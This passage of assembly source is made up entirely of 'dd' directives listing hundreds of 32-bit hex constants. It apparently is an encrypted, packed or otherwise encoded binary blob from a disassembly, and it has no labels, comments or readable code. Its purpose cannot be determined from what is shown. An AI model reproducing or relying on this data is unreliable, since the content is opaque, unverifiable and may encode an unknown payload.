49E4952Ch, 0D20201ABh, 180CBF5Bh dd 0F49C31C5h, 6B05BF2Eh, 809621CDh, 9D2ED257h, 4B75AE4h dd 9B25C04Dh, 0EA36CE3h, 0D85FF09Ah, 35C67A3Fh, 0BC4FE29Ch dd 3D66121h, 0DD7412B1h, 54F78035h, 0DC6B189Dh, 4ECBE423h dd 0F68839CAh, 603DA053h, 88AB22CBh, 6516AA6Fh, 0CBF52ECh dd 9E37C459h, 29A65EDBh, 942CED06h, 3DD46E1Bh, 0B157C682h dd 24C34A0Ah, 84638483h, 71CABD08h, 0F43C46E5h, 7A8AA002h dd 0CC4103A3h, 531FAF51h, 0C2F22DD3h, 7825AB4Bh, 0E5A92AC3h dd 0B922F967h, 17B76696h, 9A2FD95Fh, 0CA372FFh, 0A07FF98Bh dd 35E01437h, 0BC4FDF89h, 35CE6530h, 0F96239BBh, 0C6A1A256h dd 0FE5C6EA4h, 21E830CDh, 8088A3ECh, 60E72B60h, 3EA7A91h dd 563492E2h, 8256ACEh, 2EC74B0Eh, 0EBCA1AB5h, 221CB4C2h dd 11371C76h, 81FABF0Dh, 48AA0C06h, 0E46E090Eh, 529A965Dh dd 0E34225D3h, 0E401E924h, 0F0D6EF96h, 493AB66Ah, 50D07E4h dd 85CF028h, 7FEE8025h, 0CE66B28Bh, 7816B796h, 0FCDF21CDh dd 53C212BDh, 8A3AF637h, 62B2241Eh, 99EE07EEh, 10E26E37h dd 3B02168Fh, 5AC6FC96h, 3DF53CC0h, 20B4D844h, 0ABDA983Dh dd 1FB251E4h, 521D8E37h, 0C3A0E77Eh, 90250FC9h, 0FAD4BD7h dd 686FA881h, 8812A406h, 58BA6C77h, 0D058407Dh, 8C0C0E5h dd 0D022848Eh, 6A98965Eh, 0B97A74BCh, 428AEC3Eh, 0F05135C6h dd 238C49C1h, 0C9AD5480h, 332C59D1h, 7F674490h, 75D1CD6Ah dd 70E421EAh dd 7DC7A0EDh, 60F43486h, 8B6D4DFDh, 0D539C689h, 0C81CB70Ch dd 67598BEBh, 93F27CDEh, 0BB6D0BA9h, 9E31964Bh, 680D6946h dd 70FA5C96h, 0EF8D2B2Ch, 0B30CC925h, 8FEFC410h, 78DA14D1h dd 0FADBDFEh, 824FA771h, 6542923Dh, 0D59A68BEh, 0D01AC879h dd 0B65EE46Eh, 45A97B19h, 38ACC7ACh, 0BB66B453h, 0E363C3h dd 7FEA64C6h, 938523C0h, 0C5310B71h, 86ACCC6h, 6D6319A6h dd 0F86CA70Eh, 0F55FFDA5h, 0E87CB293h, 319370D7h, 276BCDAEh dd 668966E3h, 0EC2E0BEEh, 7BE49199h, 7A477CE8h, 0D8C7F452h dd 0A80A6CCEh, 1F6F651Bh, 0F2FA6AA5h, 1AE759C9h, 0D8EA7AB5h dd 24420974h, 0FBDA169Eh, 3734B8D2h, 5ED17C0Bh, 27626906h dd 6EA14EFBh, 0FA32B0F6h, 2269516Eh, 0C9CADCFCh, 0B59AFC5Eh dd 4EB81594h, 0EB7A9987h, 9C62F1AFh, 9C7FDC08h, 19B05CBEh dd 3E56ACBBh, 4300B3A6h, 0F85A544Bh, 0F18F3496h, 0DE5135E3h dd 45FAF86h, 5B3AAAC2h, 50BA300Ah, 0C89308E1h, 0AC230466h dd 0B81A7ED6h, 31969C02h, 3DF56CCEh, 20B4DFDCh, 1C77A035h dd 1073D012h, 88801CAEh, 62C0CEh, 2A886A9Eh, 65ADE316h dd 68FC1718h, 77CF6D35h, 58BA1D7Ah, 0D258C5A7h, 20AB663Fh dd 802284E6h, 5A0F030Ch, 261242EDh, 73FE1ACBh, 0A46A3096h dd 4F7ADC3Fh, 0B0D6E049h, 0F76ACC2Ch, 0B6DE0633h, 38DFE51Eh dd 643122E2h, 829E275Eh, 37937686h, 2AF63A8h, 9B2224Dh dd 185F4C6Bh, 637FB30h, 351A4AE5h, 67C0B001h, 255228A4h dd 2083E0D1h, 58C9F7BEh, 0E32BC45Ch, 0D8BA1C05h, 50329476h dd 124FC3CCh, 7152822Dh, 68C8244Ah, 0C4365B06h, 6A2FE376h dd 8332A2CAh, 74989991h, 27F84D0h, 61AFC5Ah, 0F61301DCh dd 3DF261C5h, 0B9E164F0h, 87A49B3h, 41F15480h, 8CB83378h dd 9F6A4B66h, 0F75ABC1Fh, 70D32412h, 0D2742C0Eh, 0E08434F3h dd 5C359CC0h, 50B21577h, 0BD0AB26Eh, 7E234297h, 0FF54358Eh dd 0FF19B623h, 0E70B2A08h, 4AD32A6Dh, 0CBAC0DBEh, 2C5841C9h dd 0B3B34C98h, 0DFE7CBE7h, 0F5DA3C9Eh, 0C64C2593h, 0CA468Eh dd 0E042A40Ah, 0CD454F2Eh, 0D004A8DCh, 48AA0053h, 7FA78BE6h dd 0D19AFC5Eh, 0B0127467h, 7ADAD2CFh, 250D328Fh, 187ADC9Bh dd 3CFA9235h, 8C65C112h, 80E2443Fh, 0B2F9C22h, 7FE8083Ah dd 0E84A208Bh, 40CF8986h, 0E51ABCDEh, 24D77357h, 0F486F39Bh dd 0C1DE7146h, 0D03A83A0h, 41E78022h, 0D809124Fh, 55ADCB7Ch dd 67BD9AD6h, 0AA43DB36h, 88EA6BBEh, 0FF3026D1h, 4EE1F60Bh dd 0A0928716h, 809A7CDEh, 0E042A40Fh, 36CD733Ah, 0B453FB9Ah dd 723FF36Eh, 4522B2DAh, 0BAC889Eh, 0D497FD1Fh, 798ADA72h dd 0A00064AEh, 4E2B8DBEh, 0AE67ABE6h, 856AFA12h, 0B6F9D733h dd 3169EC1Eh, 228265C2h, 7DB5FD5Fh, 60F41FF4h, 271E9879h dd 668952E3h, 48E974EEh, 76B76FEBh, 7BE37DDEh, 31F8F53Ch dd 0DBF55F31h, 0A0971B42h, 0AEBA5403h, 4E06D536h, 0D29E8C2Bh dd 0D0E91F15h, 28D9372Dh, 47E7392Ah, 0E3CA1A93h, 0E043A8BCh dd 5030977Eh, 0D33294F7h, 28612796h, 66D14F6Dh, 7F9F883Fh dd 9EF98134h, 7B852BCDh, 2B55A84Dh, 722E8CEAh, 0FAA005F6h dd 0EFF33D1h, 0BE2729Ah, 0CE61C693h, 7C16B796h, 1C96325h dd 0AC5E381h, 513A74FEh, 3711739h, 9F7ECAA1h, 1CE75627h dd 0CA791593h, 56FD8739h, 0C15D30BAh, 57ED8028h, 0EDB900CDh dd 7E17A644h, 0FA8F1ADAh, 6E0DAD55h, 8A279C2h, 9520DB7Ah dd 99E2CFCh, 9427C374h, 2CC97336h, 0D03296F6h, 48AA0C3Eh dd 0A350EDE6h, 51E0D23Ah, 0C03C12B3h, 61C4EC22h, 0CB222F85h dd 6202BB4Eh, 9A993BD9h, 5A2F9F7Bh, 0CFA82686h, 0DE7AF257h dd 4A05DE0h, 1FA67Bh, 60C22486h, 7BD71DA3h, 96B22268h dd 0FE3FE76Bh, 0D55D0466h, 0B82C4740h, 448D1C97h, 231406F2h dd 16B9B2F3h, 0A45605BEh, 7658A118h, 9515722Fh, 0BDEFE753h dd 78EC00C4h, 0A750C29Dh, 0E56F4A2Bh, 0D6757583h, 0AF3F937Eh dd 2A32A2C1h, 0C4504AE7h, 71D97AA8h, 0D3551E5Fh, 4B0D9CB7h dd 540913B1h, 0D5066CE2h, 10FF1A6Bh, 90F262F6h, 86AC4C6h dd 0C3A417A6h, 0B416F830h, 0DA47CB96h, 0E34A9A35h, 0F3D55046h dd 27699E94h, 668946E3h, 0BCEA09EEh, 4827FA6Eh, 471A4A9Eh dd 0B47A6786h, 40F59330h, 2082E44Dh, 0C7B91AEDh, 545C8779h dd 77EA00E2h, 36596EB3h, 86B3D49Eh, 1EBA4BE9h, 9735D37Bh dd 0D650758Bh, 0D5732F7Eh, 0E6729073h, 19FB5D6Eh, 9173D4B7h dd 9E0F030Fh, 581242EDh, 288AEC45h, 0F2473793h, 5C54EE0Dh dd 6FF218FAh, 3E5166BBh, 80E8ACA6h, 8B2DBC1Eh, 1EBB46E6h dd 0E80BCA7Ah, 3257DBD6h, 513AAAC5h, 66894EF3h, 451B83EEh dd 76BB75EBh, 0D89FF5DEh, 6192C26Ah, 93A0F931h, 4811E470h dd 98FA5CBAh, 90C61BBh, 5B34C98h, 365E829Bh, 8D75D49Eh dd 37344BE9h, 5ED4460Bh, 6312A406h, 6EA470DBh, 45BF94F6h dd 489C1244h, 0C148D0B6h, 50C8FC34h, 301274D4h, 14C079B1h dd 608764F0h, 9558A964h, 0A6EC093Bh, 0E009E2Eh, 9E88F12Bh dd 0AE0EBC28h, 228364C6h, 0D40439F1h, 9F9A24B0h, 0EE06DA6Bh dd 3737D276h, 0C82ABAD0h, 40A2088Eh, 0F7492BDEh, 2A1BF15h dd 0E44628E0h, 8A171B46h, 0BFA6A85h, 1072D35Eh, 5D5FC1AEh dd 5962F23Eh, 44CC8113h, 0DABAB420h, 8035D37Bh, 0E042A40Ah dd 11F45529h, 0FE66D1B8h, 48E6402Ah, 0FB881119h, 0F81FFC68h dd 0B227F0D9h, 4019EC4Eh, 0A00264C3h, 16969B3h, 1DAB5480h dd 3E56FE93h, 7411ACA6h, 45D943E1h, 70E408A0h, 0F8CEA30Eh dd 0E1C22484h, 0D83B0C12h, 51DA4076h, 372A8CEFh, 769E12F3h dd 28DEFDDEh, 6092F457h, 0A860B845h, 16171B14h, 1DFA6A82h dd 1D078DF6h, 88F9C4C6h, 0CAF73B26h, 93DA0AA5h, 9CEF37F4h dd 68CA1A90h, 65CF8D73h, 588C020Eh, 0F2A76BA6h, 0CDAA3A52h dd 49A68B26h, 0B39AFC5Fh, 0B0997896h, 0AD05DCB1h, 0A0347AAAh dd 261D59F8h, 0FAF35480h, 626BA62Eh, 0AE77BBA4h, 7B5A8A22h dd 0F4DDCB6Eh, 0E84AAD6Eh, 857A915h, 0B23AAAE0h, 0AFE14666h dd 0FE16927Bh, 4F628166h, 0B81B3C5Bh, 0B22F7956h, 190A5AD0h dd 0DAAB0C4Eh, 0C92A341h, 4E72D436h, 0BC63AA85h, 959D9002h dd 78EC073Ch, 0EEC2099Bh, 697B2CB8h, 1FB8AEEEh, 252F9181h dd 0BA32A2E8h, 48BE646Eh, 937084E6h, 4B069A1h, 0F49F74E0h dd 0BD07F86Ah, 0A03424C2h, 12CCD36Eh, 84D6103Dh, 0A622CEFh dd 0CAF045ECh, 0FB10AE1Ch, 78F6709Dh, 29454D8Eh, 6B932C66h dd 272AB8BAh, 0ED3F4444h, 0C81CB086h, 40A2188Eh, 8E3459DEh dd 10BCD42Eh, 8D304CE0h, 18ACC163h, 0B88279C6h, 5A78A713h dd 0A8A405E1h, 959D9326h, 78EC07C4h, 0F0FE7097h, 68A02C8Eh dd 1F11F356h, 6E8636EBh, 54BF1FF6h, 22AA3A7Bh, 0AB3967E6h dd 0D0CBF197h, 0B01274D3h, 22EEC968h, 35FD33C6h, 184CE764h dd 0C0FE9035h, 0F02C7C5h, 0DE244A6h, 0CE442AA3h, 8F816396h dd 0DE76869Bh, 1E02A186h, 0B08F11AAh, 0D3B2224Ah, 0FE3F084Bh dd 0CD2F0466h, 0B82C42B9h, 30F83A7Dh, 57593A9Fh, 16BEC2D3h dd 9802DFBEh, 9BE3FB48h, 0E05FC150h, 0B062F21Ah, 0D74CE93h dd 0E7BAD406h, 935D374h, 0E9A1B374h, 0B3BB6BF3h, 0FBFD1F1Ch dd 201781A0h, 3322B2DAh, 0D36D7BFAh, 25ED276Fh, 28BCD054h dd 0B569D946h, 6C7BDC08h, 0E5C23C9Ch, 9D95CC2Eh, 80D47F6Ch dd 0C63D019Eh, 4D234A0h dd 84CF6B1Fh, 60C21298h, 1E3A9CFEh, 668C73F3h, 0C0C38CEEh dd 875DFB98h, 8E0F085Bh, 3092F456h, 0ACC8314Eh, 6F88E946h dd 0F795329Eh, 761DF458h, 0EE83208Eh, 4F42E543h, 15B348BEh dd 9F269473h, 4AF4FAEh, 8130C663h, 559B790Ah, 0F012B4FCh dd 68E52C4Eh, 0AD4FF195h, 5FBA8E3Bh, 0D57606B7h, 2287CD20h dd 0C56E0194h, 7D16A850h, 0E99E27C5h, 780BA40Eh, 0E1C23DD6h dd 9D7AD870h, 13B744EEh, 9C24CD7Ah, 14B104AAh, 0B15EF29Fh dd 70887318h, 9F2081C3h, 28C17007h, 987D12B7h, 10FE9837h dd 88730DAAh, 0E68A27h, 0F09D35D0h, 7652F842h, 0EECA3EC1h dd 6E07AD54h, 31FA4FFAh, 9933C336h, 62C716FAh, 9227CC51h dd 2ADB3C1Bh, 0BF4BB493h, 2E8A201Bh, 0AE47ED94h, 18A58F3Ah dd 0D57F1B95h, 5CC3CC6Fh, 80710DE6h, 7D17B54Ah, 0E4BB7497h dd 644ABF09h, 0A18730C7h, 0C89D381Ah, 3F064E95h, 2F223481h dd 2C60852Eh, 0C89C88D7h, 30DC6BD9h, 0B540EEh, 82CEC83Ah dd 60A2CF8Ch, 89B09086h, 0B6692FEEh, 2082E446h, 98FA5CBEh dd 1072D436h, 88EA4CAEh, 62C426h, 78DA3C9Eh, 0F052B416h dd 68CA2C8Eh, 0E042A406h, 58BA1C7Eh, 0D03294F6h, 48AA0C6Eh dd 0C02284E6h, 389AFC5Eh, 0B01274D6h, 288AEC4Eh, 0A00264C6h dd 187ADC3Eh, 90F254B6h, 86ACC2Eh, 80E244A6h, 2CFF3F7Eh dd 70D202A9h, 0D792098Dh, 6FC224B0h, 552EDF49h, 0E7BD0C25h dd 18298AA5h, 648640EDh, 0CA163EF5h, 38D0CF4Fh, 0EA8178BDh dd 2CC0CF52h, 0A72EC937h, 95FBD400h, 88DC7376h, 0C2E1C1CDh dd 1903DEB6h, 7852B0D4h, 5EEE4A0Bh, 0E0264C06h, 78D21C7Eh dd 5D3294F6h, 7E899FEBh, 0D81BDDE6h, 0F819F02Ah, 4FE596D2h dd 1EB558CBh, 79F5A7C6h, 3C1C513Dh, 80115480h, 8796BCD1h dd 840AC7A6h, 65D34AFCh, 70E41705h, 9C4A968Dh, 63F00F83h dd 96B78C8Ch, 0EE94C8Ah, 0BC2AB66Dh, 0AB90FB62h, 0A86883DDh dd 0CF6DA3BEh, 83C44731h, 16BD3CCBh, 0D3F904BEh, 95FD1702h dd 88DC7316h, 3FD641E1h, 78DA3CA8h, 0CCBAB416h, 0E3CA2C8Eh dd 0D67D1083h, 0AE2CF47Eh, 0C8DA6B09h, 0CBAA0C6Eh, 0F61D305Bh dd 30EFFC5Eh, 941DE95Fh, 0B461EC78h, 9FB6E939h, 97B9DC08h dd 0A6CDEC33h, 0BCFF452Eh, 68E27299h, 0F85ABC1Dh, 0FB11FDA5h dd 0E84A2C9Dh, 8D2A7686h, 0DBC56300h, 668DCCE3h, 4BFC8FEEh dd 4FA2081Ch, 0B81B7B5Ah, 20E87756h, 558E63CEh, 0AB82E446h dd 70AA50FCh, 0EF8D2AFEh, 0B732C9ADh, 0C661C410h, 0F8D2B6CEh dd 0E926B4EFh, 1CE4D50Eh, 11A9E405h, 0D9BB54F5h, 0FED4B17h dd 0C538DB1h, 0B522C8AAh, 0F0B1A5B2h, 0BFE88D55h, 288A5BC1h dd 0D88302C6h, 1748EFC0h, 90F2FF33h, 32E99A2Eh, 0BE731A6h dd 0FAB1AC54h, 81D13E1Dh, 1638445Fh, 0D5C1DB79h, 0D80CA326h dd 287291DBh, 4CAE8315h, 0BFA20466h, 8E25A46Bh, 657AA456h dd 0ABF59330h, 16BD3CC3h, 407FD3BEh, 1372E209h, 0BB968AAh dd 0DB51C6E6h, 9BD28A91h, 0D09B3404h, 4CEEEDDDh, 0C45E8D02h dd 39E1057h, 51DB7FB6h, 0F37D0395h, 411CF03Bh, 56DF54A5h dd 3124000Dh, 89B1B5B5h, 212C1039h, 0AD580AC5h, 11D4201Ah dd 50835FD5h, 1FC3055h, 0A0B3C1E5h, 0F1C44065h, 0CD75EAF5h dd 0E1CC5067h, 0FD05AC05h, 0AFB46097h, 0FE15347Bh, 314B5F66h dd 0E6E58321h, 0D98636D5h, 57F59221h, 24E8E585h, 6DCCB4E6h dd 85FA2BC9h, 88DC6AEEh, 18537C40h, 9C1ADE9Ch, 96B0B615h dd 30CC4625h, 1FB7BFEEh, 50789F81h, 0D5584571h, 0BDA4E436h dd 3AA27B19h, 88918F5Dh, 0F0977686h, 828ADA68h, 0C868432Dh dd 0E2FA7666h, 20EA21B5h, 0FC84243Fh, 815ABB59h, 7C5ABC1Eh dd 0A1DF4044h, 38052EEh, 0D8C7CF70h, 583A9CFEh, 930DF6DDh dd 0F09A1963h, 97890450h, 4FD9A629h, 6AA51D3h, 0A80A6CCEh dd 0E017EB4Eh, 6EF1BC7Fh, 264A77B3h, 8E9F4DAEh, 25EBC940h dd 0FD2C2F75h, 0F0648CB5h, 0ECC598Ch, 0B67950Bh, 59B77A7Ah dd 3899F2D3h, 0B755F3D2h, 4916C76Dh, 0EA530CBh, 47D1DFD6h dd 1EB249CBh, 0A00264C6h, 0D8EFD336h, 7858E8B2h, 0F79533B2h dd 0BF32D12Fh, 7DACBC28h, 70E40C35h, 0E74ED90Fh, 4BC0CFB7h dd 2FF9373Eh, 668AB1F3h, 0C82A8CEEh, 0CA85706Eh, 8E22E35Bh dd 3B723556h, 0ED8161A8h, 0D8324F20h, 77FD614h, 0D172E20Eh dd 0EFEF574Eh, 0AB644D42h, 0D3BCFCADh, 94EAA6FDh, 0C3CA2901h dd 0D8DD218Ch, 0BE1C48h, 7B2A7437h, 0A356BCADh, 2B9AE2C6h dd 0D3319A5Eh, 0E8161ECFh, 0D77913A6h, 7206E939h, 7E723CFFh dd 0F632DDB3h, 0B8692785h, 8288EE36h, 0BBC5446h, 0A256CB69h dd 0E0209E7Ah, 9318CCDEh, 12C46301h, 95C6D704h, 15E4610h dd 9BD6CE98h, 0B46EB620h, 3CE63EA8h, 0A47EA630h, 0ED691DF6h dd 5111A10Eh, 0D5992186h, 4901B41Eh, 0B0DF49E5h, 8FDA0AA6h dd 0C66A1193h, 68CA2C8Eh, 5041D086h, 0DD4DB61Eh, 0D004AC53h dd 40AA0C6Eh, 959A8392h, 939A10D5h, 15978399h, 2B8ADA76h dd 0AF0364C6h, 187A0BBAh, 3A1AE4B6h, 0B4D74585h, 30E27299h dd 71F116F6h, 46EDF42Bh, 4DCF5B0Eh, 63C212BEh, 0AC3A9CFEh dd 0F537E363h, 0C82ABAD6h, 34A30466h, 46DB94DBh, 0D9220BA9h dd 2D81C764h, 20B4DBFAh, 50D19335h, 2FB669BFh, 0C0634C98h dd 64057CDAh, 4B710A61h, 7F9D2D6h, 5EF2890Bh, 0E042A706h dd 0AEB4687Eh, 0E60A3773h, 4DDE8C6Eh, 3FDCC60Eh, 5CFD44A1h dd 83B9525Fh, 0DF218A8Eh, 963AC143h, 187ADF3Eh, 66A720B6h dd 3E526FABh, 8597C4A6h, 7A4A2F6h, 8D76DC69h, 0C8FA53F1h dd 9F39926Eh, 0BE037F01h, 36A7EBCEh, 43811D45h, 769AA1F3h dd 4FC88BDEh, 3092F794h, 401E19CEh, 0DF7D1938h, 812430Eh dd 768D2BCDh, 0EEFFB316h, 8BC9558Dh, 0BC5FB751h, 0DB528229h dd 9482A546h, 0D8E721F1h, 58B91C48h, 0FE4694F6h, 700F8999h dd 0C02284D0h, 1AEEFA5Eh, 88B7F121h, 288AEC78h, 0A57765C6h dd 0E7872ED6h, 3577A349h, 86AFA16h, 0F4E644A6h, 657541Bh dd 0F525CB69h, 0E87C94ABh, 60C22482h, 0BFD28B8Ah, 0E84DEB88h dd 0D44CC7h, 80AABCCDh, 0B178AAh, 57790C23h, 0D8F9B65h dd 2882D27Eh, 0EDFA5CBEh, 0B3CF5479h, 88EA7A96h, 3B8A8252h dd 0C025C360h, 397BAC3Fh, 50558984h, 482A430h, 0C71F167Dh dd 7B32A2CEh, 0C200BDDEh, 0F61A2763h, 782A565Eh, 888DF1DCh dd 4E20EC78h, 57FF867Eh, 2E4279BBh, 90F244B6h, 0B86DB82Eh dd 3884EEEFh, 533C406Bh, 4378DC26h, 55C307CEh, 60F41B2Eh dd 0E09F1909h, 50921440h, 0C15F8CEEh, 0C5A85CD6h, 0B82C4443h dd 0B12A92FCh, 0D8F9B0Eh, 6082D27Eh, 0ECFA5CBEh, 38B65435h dd 0B077E9A4h, 0AB04C410h, 47768117h, 7F9B420h, 5EF2890Bh dd 0E042A406h, 0E8B3693Eh, 4DB796A6h, 0E2AA3A56h, 0F8870111h dd 381AFC68h, 0BB6774D6h, 0AD8054FEh, 0A0345C58h, 7E473794h dd 67EA650Eh, 3E5269ABh, 80E344A6h, 4858C81Eh, 0EE773EBFh dd 284A9A36h, 0C5C82762h, 0D80CA460h, 0E8D4BF10h, 4DDD7C6Fh dd 40943CC3h, 0B81A7EDEh, 0F826F623h, 9094C9C4h, 8BE4E470h dd 0A732E137h, 0A0CAD400h, 23EA4C86h, 38C741D1h, 78D23CA8h dd 8126B416h, 97371D66h, 45C753F9h, 58BA2A46h, 0A53294F2h dd 4212BC65h, 0F61A1B63h, 7571565Eh, 88B7F121h, 208AEC78h dd 0B17764C6h, 0F8F96458h, 0A86DF1BCh, 0A30CCC18h, 6B488495h dd 0D1E2DA0Bh, 0EF773E8Eh dd 284A9A36h, 0C5C82762h, 0D80CA461h, 0D545BF10h, 0C81CB44Bh dd 40A21466h, 789BC4B8h, 0F412F722h, 37AF66C6h, 4682D27Eh dd 1D4C5315h, 1044EC95h, 742AA405h, 85953BD9h, 78EC043Bh dd 0B052B416h, 387A25FAh, 0D8DF2104h, 0AF101C48h, 0E60A3173h dd 488A0C6Eh, 0B5A434E6h, 0B59EF85Ch, 15988A99h, 28BCD4D3h dd 9FB2E94Fh, 0B31CDC08h, 0E5F7A836h, 886A7C29h, 2AA2BBE9h dd 7A6C5F6h, 0D557C369h, 0E84A9A36h, 6C224C6h, 0AD0BFA46h dd 369BA074h, 0C2323C45h, 769A9BE3h, 0BBFABCDEh, 0CCC61CFCh dd 20BA9331h, 182761B1h, 18FA5C88h, 1207D436h, 2D60CA1Eh dd 54FCBBh, 845A97F8h, 4055C113h, 9785AC8Eh, 0CBAA0E46h dd 0AF45E382h, 0E60A3173h, 49AA0C6Eh, 7029F1E6h, 0A51FF61Eh dd 1A1242EEh, 90ECE3A5h, 508A445h, 184CE4A3h, 9142FFD0h dd 0ADEF3B84h, 80E2729Eh, 8D5ABE1Eh, 0D557C3B9h, 0E84A9A36h dd 15C22086h, 0D2FA2CE4h, 668A8BF3h, 6C8F06EEh, 81A2325Eh dd 7C6C3Eh, 80397530h, 180287CEh, 0BF07EE06h, 32FA6A86h dd 28D751C1h, 88EA4C98h, 1017C42Eh, 905984F8h, 0C8CC111Ch dd 0C3AC2CB8h, 0E8A9A5B6h, 0DDB054CEh, 0D004AC68h, 0ED2FFBC4h dd 0C022B2DEh, 899AEC5Eh, 0D63701A3h, 22726FF6h, 963AFA63h dd 2BD1BA3Eh, 2DDBFE76h, 85CF39Eh, 0B847C151h, 0F85ABC28h dd 6FA734B6h, 0F3A1DBBFh, 78CB9CE0h, 0E0A439F4h, 0B4721440h dd 568F86EDh, 26A2325Eh, 8A75575h, 0BA92C269h, 18AFE60Fh dd 4682D279h, 9AA2EC15h, 264A49B3h, 0D1DE6AEh, 54FC83h dd 79DA3C9Dh, 75A59662h, 68FC142Bh, 0E442A406h, 0DD4D0A0Bh dd 0D004AC53h, 4BAA0C6Eh, 44CA8193h, 0D06503A4h, 4FED8E7Dh dd 102F69B9h, 0A00264F0h, 1B0ED43Eh, 67589D06h, 3E5269ABh dd 80E244A6h, 487AC89Eh, 0ED571E91h, 294A9A36h, 0E9CF3E66h dd 0DA3AB8F6h, 668A89D3h, 0CBCE4CEEh, 0EBA6C0E6h, 0DEB01D6Eh dd 3A720BEEh, 9E32F16Bh, 0D7298246h, 0AEC2F93Bh, 1072F436h dd 7FB938AEh, 365A61A3h, 78DA3C9Eh, 75FC036h, 68CA2F49h dd 5047D006h, 0AB51B6EEh, 5DB9537Dh, 489C33C6h, 81AB45CDh dd 32C24CA2h, 862AE953h, 0AD7D464Eh, 0A0345C63h, 183ADC3Eh dd 289458C2h, 8D600F7Eh, 80D47C3Bh, 403CB6F5h, 0D5D8D469h dd 0E87C9493h, 0E5358FE0h, 0D80CA45Bh, 51B21475h, 4DDDFF9Ah dd 40943CC3h, 981A7CDEh, 0F765F922h, 0A80A6CCDh, 0B032E132h dd 1309B714h, 0D0F75FF9h, 0A3EA7A91h, 0FC2A4DEEh, 0FD2DF5ADh dd 0F0648CB3h, 684A2C8Eh, 65CFAA73h, 588C24E3h, 50729C7Ch dd 0B0D90F97h, 84EF806Bh, 0F99AEC7Ah, 3BA27C36h, 4E8C0FE5h dd 0C6C2557Eh, 97C2BA95h, 904A3C36h, 0E968CC2Eh, 2BBAEFC0h dd 0FE2F759Bh, 0B0E38CF0h, 2BFA0768h, 0D047A92Ch, 2F3AAAC6h dd 668AB1F3h, 0C82A8CEEh, 17A47176h, 534284F5h, 18C17F4Fh dd 782194E5h, 1F4A69CDh, 0DFB5C88h, 1044EB9Eh, 0CC6175AFh dd 0BDEBC002h, 78EC2CF9h, 0CFFE099Dh, 0EDE12CB8h, 0E0749BAEh dd 601F9989h, 0D07294C0h, 4ADE0C6Eh, 2895C11h, 6FCCFC5Ah dd 8FF2C955h, 278AEC78h, 0A003BD42h, 1877343Eh, 0D5B954B6h dd 442F827Ch, 0C4CC7695h, 75AF052h, 46E9A603h, 1CCF250Eh dd 33C212B9h, 0DB06C475h, 78C1EBAEh, 201ECF65h, 0BF5DF186h dd 87CEE955h, 33C9F460h, 2D83608Ch, 20B4DBBEh, 11F21EBDh dd 264D28B3h, 0A099C7AEh, 0E277D9h, 0C1323C9Eh, 7BAD4BE3h dd 5EF5F833h, 4DAAF206h, 0D345E38Bh, 0E60D4063h, 40E0876Eh dd 0EB2ECEE5h, 3D737F90h, 0B172FCD9h, 0AC85EC4Eh, 0A002659Ch dd 27A2693Dh, 25F15480h, 85CF3B6h, 8F0A780Ah, 0F85A1E9Bh dd 7494B996h, 0D7D22925h, 66C124B0h, 2D5074AEh, 0ED31EB89h dd 0C81CB33Ah, 7BA97166h, 3B157099h, 3092F54Dh, 3D336025h dd 20B4DB92h, 99F7D9B1h, 9571D436h, 88DC7336h, 0FF5A4540h dd 845F33BBh, 7B52B416h, 2BE12ECEh, 0CDAAF432h, 6145E38Bh dd 0E60D404Bh, 0AC2F036Eh, 0C32284E6h, 0EA524DBh, 289777D6h dd 0A38ADA71h, 0AC454FC6h, 18B75E31h, 0D7C954B6h, 0CCE9C326h dd 3E244A6h, 0BF59BEDEh, 0E8573782h, 0BA4A9A31h, 9477DBD6h dd 273AAAC1h, 668946E3h, 8AFD6EEh, 40158169h, 24F37CDEh dd 0C92F456h, 3C8F6331h, 0A082E446h, 1DF54980h, 1072D4BDh dd 0A3EB0A25h, 0E832F065h, 8725C822h, 0CF86092Fh, 1FBF2CB8h dd 0DF9A2105h, 0DDB91C48h, 0D004AB6Eh, 8AA89E7h, 0C0A984D0h dd 7627965h, 0B86074E0h, 17766975h, 0C97064F0h, 187ADC03h dd 78C526C6h, 86ACC31h, 0B1E0A2Bh, 0FB5897DFh, 0F5E924D4h dd 0E87CEC0Eh, 0A44128F3h, 570B63EEh, 31AE3032h, 47E99705h dd 769DBCE3h, 0D911CDEh, 30A4CBCEh, 57FF3626h, 202B85B9h dd 0ED7A5CBEh, 1C35FF38h, 0CFD145DCh, 3CE0CB2Eh, 3125C361h dd 0EE03119h, 5441D371h, 45E52522h, 0A7BA1C56h, 3B4D6B09h dd 6CE08D2Ch, 20228486h, 0B35ACF10h, 359550DAh, 28BCD3AEh dd 9FDEE14Fh, 0A1F7DC08h, 90F27C1Fh, 37F2492Dh, 25844490h dd 3E71F2BBh, 5BC67695h, 0AE8CA04Ch, 0E105CC7Dh, 0D83A9CACh dd 50B21473h, 97D6CA67h, 0BFF5C738h, 8E21E24Bh, 2F7A3556h dd 0A910E9C1h, 74D2E446h, 679074D4h, 2B8C41C9h, 486F4C98h dd 5EACB79h, 90DA3C9Fh, 0FAD5156h, 68CA3D66h, 9427F706h dd 3DD67538h, 0A551F1A5h, 31DE651Ch, 75DD84A7h, 38ACC332h dd 8B40E129h, 0AD03EC78h, 0A0345BB2h, 187AC5D6h, 0C49707B6h dd 470FA74Fh, 0F2872AD1h, 8833D46Dh, 6BB46C6h, 8F2FC067h dd 889524E3h, 27C575EFh, 50B2079Eh, 9A4FDFEEh, 2FD67703h dd 0CA4A19ACh, 5CFB823Fh, 0A86F0BABh, 0C8710C11h, 8A12A341h dd 4372D436h, 0EB8B0ECBh, 5012B14Dh, 11AC55ECh, 9535D17Ah dd 0BE227B8Eh, 8BD5BEEh, 58BA1C66h, 0B871F1A5h, 2DCD620Fh dd 0A956EBA8h, 4ACA8538h, 0DC7B02BFh, 28EF8B2Bh, 48B18C91h dd 4C2A23C1h, 0AA42D13Bh, 6C00CC18h, 0D7E32EF6h, 0C45029E1h dd 4C5B34A0h, 0AEDF532Ah, 4AC212BDh, 0B087113Eh, 0B22248h dd 7DD5DCBEh, 40943ED6h, 0BC1A7DB6h, 31F8A056h, 0DC9F9399h dd 7482D279h, 67AD58D4h, 264DA0A3h, 9C2ECFAEh, 3F0E71D9h dd 0ED253CA8h, 0F0648F94h, 0DD47EFD1h, 0E0749A6Eh, 0DE2FE328h dd 5332A2CDh, 0CCA5F396h, 0C022845Dh, 7E279D7h, 0B07874E0h dd 0EA1F1318h, 250252FDh, 0BCFED3FEh, 0BBF254B6h, 623A9CEEh dd 818814A5h, 0F85ABC76h, 0E52D6256h, 0E87C976Ch, 6F3DDC05h dd 0D83F747Ah, 2C379D76h, 452ABAD1h, 769D84EBh, 308FF1DEh dd 6192C269h, 0F80A069Ch, 1B0C71B9h, 